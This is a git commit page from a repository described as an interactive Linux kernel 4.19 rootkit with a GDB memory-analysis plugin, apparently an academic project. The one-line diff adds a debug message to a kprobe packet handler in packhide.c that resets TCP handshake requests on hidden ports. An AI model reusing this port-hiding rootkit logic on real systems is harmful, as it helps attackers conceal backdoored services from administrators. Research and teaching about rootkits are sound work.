adds blocked handshake request debug info - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit e6fbb887c53a917a1a3913d80181f1a94f188ec7
parent 3842e8e2d75b76867c6c05fb8f81e2f40c77a340
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 19:40:24 +0100

adds blocked handshake request debug info

Diffstat:
M src/packhide.c  | 1 +

1 file changed, 1 insertion(+), 0 deletions(-)
diff --git a/src/packhide.c b/src/packhide.c
@@ -207,6 +207,7 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
 check_port:
             if (list_contains_lport(&hidden_lports, src_port))
                 if (tcphdr->syn) {
+                    DEBUG_NOTICE("[g7] blocked handshake request on port %d\n", src_port);
                     tcphdr->syn = 0;
                     tcphdr->ack = 0;
                     tcphdr->rst = 1;

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs